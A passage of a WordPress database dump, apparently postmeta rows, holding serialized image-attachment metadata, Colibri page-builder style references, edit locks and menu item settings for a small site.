7910612.png\";}}'),(31,18,'_wp_attached_file','2022/02/header-scaled.jpg'),(32,18,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:709;s:4:\"file\";s:25:\"2022/02/header-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:3:{s:4:\"file\";s:17:\"header-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;}s:5:\"large\";a:3:{s:4:\"file\";s:19:\"header-1024x283.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:283;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:18:\"header-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:18:\"header-768x213.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:213;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:19:\"header-1536x425.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:425;}s:9:\"2048x2048\";a:3:{s:4:\"file\";s:19:\"header-2048x567.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:567;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644921318\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:10:\"header.jpg\";s:15:\"image-converter\";a:6:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";s:9:\"2048x2048\";s:3:\"IME\";}}'),(36,20,'_wp_page_template','page-templates/homepage.php'),(37,20,'is_colibri-wp_front_page','1'),(38,22,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:864;i:29;i:865;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(40,25,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(42,28,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(44,31,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:72;i:3;i:73;i:4;i:74;i:5;i:75;i:6;i:76;i:7;i:77;i:8;i:78;i:9;i:79;i:10;i:80;i:11;i:81;i:12;i:82;i:13;i:83;i:14;i:84;i:15;i:85;i:16;i:86;i:17;i:87;i:18;i:88;i:19;i:89;i:20;i:90;i:21;i:91;i:22;i:92;i:23;i:93;i:24;i:68;i:25;i:69;i:26;i:70;i:27;i:71;i:28;i:94;i:29;i:99;i:30;i:100;i:31;i:101;i:32;i:102;i:33;i:95;i:34;i:96;i:35;i:97;i:36;i:98;}}}'),(45,33,'extend_builder','a:1:{s:4:\"json\";i:32;}'),(46,34,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:109;i:3;i:110;i:4;i:111;i:5;i:112;i:6;i:113;i:7;i:114;i:8;i:115;i:9;i:116;i:10;i:117;i:11;i:118;i:12;i:119;i:13;i:120;i:14;i:121;i:15;i:122;i:16;i:123;i:17;i:124;i:18;i:125;i:19;i:126;i:20;i:127;i:21;i:128;i:22;i:129;i:23;i:130;i:24;i:105;i:25;i:106;i:26;i:107;i:27;i:108;}}}'),(47,36,'extend_builder','a:1:{s:4:\"json\";i:35;}'),(48,37,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(49,39,'extend_builder','a:1:{s:4:\"json\";i:38;}'),(50,40,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(51,42,'extend_builder','a:1:{s:4:\"json\";i:41;}'),(52,43,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:2:{s:5:\"43-s5\";a:1:{s:4:\"data\";a:1:{s:21:\"componentsWithEffects\";a:0:{}}}s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:166;i:3;i:167;i:4;i:168;i:5;i:169;i:6;i:170;i:7;i:171;i:8;i:172;i:9;i:173;i:10;i:174;i:11;i:175;i:12;i:162;i:13;i:163;i:14;i:164;i:15;i:165;}}}'),(53,45,'extend_builder','a:1:{s:4:\"json\";i:44;}'),(54,46,'extend_builder','a:2:{s:4:\"json\";i:47;s:4:\"meta\";a:2:{s:5:\"46-s5\";a:1:{s:4:\"data\";a:1:{s:21:\"componentsWithEffects\";a:0:{}}}s:9:\"styleRefs\";a:16:{i:0;i:176;i:1;i:177;i:2;i:182;i:3;i:183;i:4;i:184;i:5;i:185;i:6;i:186;i:7;i:187;i:8;i:188;i:9;i:189;i:10;i:190;i:11;i:191;i:12;i:178;i:13;i:179;i:14;i:180;i:15;i:181;}}}'),(55,48,'extend_builder','a:1:{s:4:\"json\";i:47;}'),(56,50,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:162;i:3;i:163;i:4;i:164;i:5;i:165;i:6;i:166;i:7;i:167;i:8;i:168;i:9;i:169;i:10;i:170;i:11;i:171;i:12;i:172;i:13;i:173;i:14;i:174;i:15;i:175;}}}'),(57,52,'extend_builder','a:2:{s:4:\"json\";i:47;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:176;i:1;i:177;i:2;i:178;i:3;i:179;i:4;i:180;i:5;i:181;i:6;i:182;i:7;i:183;i:8;i:184;i:9;i:185;i:10;i:186;i:11;i:187;i:12;i:188;i:13;i:189;i:14;i:190;i:15;i:191;}}}'),(61,60,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(62,62,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:68;i:3;i:69;i:4;i:70;i:5;i:71;i:6;i:72;i:7;i:73;i:8;i:74;i:9;i:75;i:10;i:76;i:11;i:77;i:12;i:78;i:13;i:79;i:14;i:80;i:15;i:81;i:16;i:82;i:17;i:83;i:18;i:84;i:19;i:85;i:20;i:86;i:21;i:87;i:22;i:88;i:23;i:89;i:24;i:90;i:25;i:91;i:26;i:92;i:27;i:93;i:28;i:94;i:29;i:95;i:30;i:96;i:31;i:97;i:32;i:98;i:33;i:99;i:34;i:100;i:35;i:101;i:36;i:102;}}}'),(63,64,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:105;i:3;i:106;i:4;i:107;i:5;i:108;i:6;i:109;i:7;i:110;i:8;i:111;i:9;i:112;i:10;i:113;i:11;i:114;i:12;i:115;i:13;i:116;i:14;i:117;i:15;i:118;i:16;i:119;i:17;i:120;i:18;i:121;i:19;i:122;i:20;i:123;i:21;i:124;i:22;i:125;i:23;i:126;i:24;i:127;i:25;i:128;i:26;i:129;i:27;i:130;}}}'),(64,66,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(65,68,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:162;i:3;i:163;i:4;i:164;i:5;i:165;i:6;i:166;i:7;i:167;i:8;i:168;i:9;i:169;i:10;i:170;i:11;i:171;i:12;i:172;i:13;i:173;i:14;i:174;i:15;i:175;}}}'),(69,76,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(70,78,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:68;i:3;i:69;i:4;i:70;i:5;i:71;i:6;i:72;i:7;i:73;i:8;i:74;i:9;i:75;i:10;i:76;i:11;i:77;i:12;i:78;i:13;i:79;i:14;i:80;i:15;i:81;i:16;i:82;i:17;i:83;i:18;i:84;i:19;i:85;i:20;i:86;i:21;i:87;i:22;i:88;i:23;i:89;i:24;i:90;i:25;i:91;i:26;i:92;i:27;i:93;i:28;i:94;i:29;i:95;i:30;i:96;i:31;i:97;i:32;i:98;i:33;i:99;i:34;i:100;i:35;i:101;i:36;i:102;}}}'),(71,80,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:105;i:3;i:106;i:4;i:107;i:5;i:108;i:6;i:109;i:7;i:110;i:8;i:111;i:9;i:112;i:10;i:113;i:11;i:114;i:12;i:115;i:13;i:116;i:14;i:117;i:15;i:118;i:16;i:119;i:17;i:120;i:18;i:121;i:19;i:122;i:20;i:123;i:21;i:124;i:22;i:125;i:23;i:126;i:24;i:127;i:25;i:128;i:26;i:129;i:27;i:130;}}}'),(72,82,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(76,86,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:68;i:3;i:69;i:4;i:70;i:5;i:71;i:6;i:72;i:7;i:73;i:8;i:74;i:9;i:75;i:10;i:76;i:11;i:77;i:12;i:78;i:13;i:79;i:14;i:80;i:15;i:81;i:16;i:82;i:17;i:83;i:18;i:84;i:19;i:85;i:20;i:86;i:21;i:87;i:22;i:88;i:23;i:89;i:24;i:90;i:25;i:91;i:26;i:92;i:27;i:93;i:28;i:94;i:29;i:95;i:30;i:96;i:31;i:97;i:32;i:98;i:33;i:99;i:34;i:100;i:35;i:101;i:36;i:102;}}}'),(77,87,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:105;i:3;i:106;i:4;i:107;i:5;i:108;i:6;i:109;i:7;i:110;i:8;i:111;i:9;i:112;i:10;i:113;i:11;i:114;i:12;i:115;i:13;i:116;i:14;i:117;i:15;i:118;i:16;i:119;i:17;i:120;i:18;i:121;i:19;i:122;i:20;i:123;i:21;i:124;i:22;i:125;i:23;i:126;i:24;i:127;i:25;i:128;i:26;i:129;i:27;i:130;}}}'),(78,88,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(79,89,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(80,90,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:162;i:3;i:163;i:4;i:164;i:5;i:165;i:6;i:166;i:7;i:167;i:8;i:168;i:9;i:169;i:10;i:170;i:11;i:171;i:12;i:172;i:13;i:173;i:14;i:174;i:15;i:175;}}}'),(81,91,'extend_builder','a:2:{s:4:\"json\";i:47;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:176;i:1;i:177;i:2;i:178;i:3;i:179;i:4;i:180;i:5;i:181;i:6;i:182;i:7;i:183;i:8;i:184;i:9;i:185;i:10;i:186;i:11;i:187;i:12;i:188;i:13;i:189;i:14;i:190;i:15;i:191;}}}'),(83,93,'_wp_attached_file','2022/02/cropped-header-scaled-1.jpg'),(84,93,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1725;s:6:\"height\";i:709;s:4:\"file\";s:35:\"2022/02/cropped-header-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:35:\"cropped-header-scaled-1-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;}s:5:\"large\";a:3:{s:4:\"file\";s:36:\"cropped-header-scaled-1-1024x421.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:421;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:35:\"cropped-header-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:35:\"cropped-header-scaled-1-768x316.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:316;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:36:\"cropped-header-scaled-1-1536x631.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:631;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644921318\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(85,94,'_wp_attached_file','2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png'),(86,94,'_wp_attachment_context','site-icon'),(87,94,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:64:\"2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:3:{s:4:\"file\";s:64:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:64:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:64:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:64:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:64:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:62:\"cropped-DICE-log-6-sides-Largbox_text-e1644937921882-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:2:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";}}'),(88,95,'_wp_attached_file','2022/02/colibri-image-299.png'),(89,95,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1143;s:6:\"height\";i:767;s:4:\"file\";s:29:\"2022/02/colibri-image-299.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:3:{s:4:\"file\";s:29:\"colibri-image-299-300x201.png\";s:5:\"width\";i:300;s:6:\"height\";i:201;}s:5:\"large\";a:3:{s:4:\"file\";s:30:\"colibri-image-299-1024x687.png\";s:5:\"width\";i:1024;s:6:\"height\";i:687;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:29:\"colibri-image-299-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:29:\"colibri-image-299-768x515.png\";s:5:\"width\";i:768;s:6:\"height\";i:515;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:4:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";}}'),(90,96,'_wp_attached_file','2022/02/colibri-image-298.png'),(91,96,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:29:\"2022/02/colibri-image-298.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:29:\"colibri-image-298-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;}s:5:\"large\";a:3:{s:4:\"file\";s:30:\"colibri-image-298-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:29:\"colibri-image-298-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:29:\"colibri-image-298-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:30:\"colibri-image-298-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(105,103,'_wp_attached_file','2022/02/marc-szeglat-BsAzhHIIwxg-unsplash-scaled.jpg'),(106,103,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1417;s:4:\"file\";s:52:\"2022/02/marc-szeglat-BsAzhHIIwxg-unsplash-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:3:{s:4:\"file\";s:45:\"marc-szeglat-BsAzhHIIwxg-unsplash-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;}s:5:\"large\";a:3:{s:4:\"file\";s:46:\"marc-szeglat-BsAzhHIIwxg-unsplash-1024x567.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:567;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:45:\"marc-szeglat-BsAzhHIIwxg-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:45:\"marc-szeglat-BsAzhHIIwxg-unsplash-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:46:\"marc-szeglat-BsAzhHIIwxg-unsplash-1536x850.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:850;}s:9:\"2048x2048\";a:3:{s:4:\"file\";s:47:\"marc-szeglat-BsAzhHIIwxg-unsplash-2048x1133.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1133;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644922576\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:37:\"marc-szeglat-BsAzhHIIwxg-unsplash.jpg\";s:15:\"image-converter\";a:6:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";s:9:\"2048x2048\";s:3:\"IME\";}}'),(107,104,'_wp_attached_file','2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg'),(108,104,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1417;s:6:\"height\";i:991;s:4:\"file\";s:62:\"2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:3:{s:4:\"file\";s:62:\"cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;}s:5:\"large\";a:3:{s:4:\"file\";s:63:\"cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:716;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:62:\"cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:62:\"cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-768x537.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644922576\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:4:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";}}'),(109,104,'_oembed_da3f83beb0d6cdc52279c0a8f42aa52a','{{unknown}}'),(132,122,'_edit_lock','1645034516:1'),(133,126,'_edit_lock','1695997051:1'),(160,138,'_menu_item_type','post_type'),(161,138,'_menu_item_menu_item_parent','0'),(162,138,'_menu_item_object_id','122'),(163,138,'_menu_item_object','page'),(164,138,'_menu_item_target',''),(165,138,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(166,138,'_menu_item_xfn',''),(167,138,'_menu_item_url',''),(172,141,'_wp_attached_file','2022/02/cropped-cropped-header-scaled-1.jpg'),(173,141,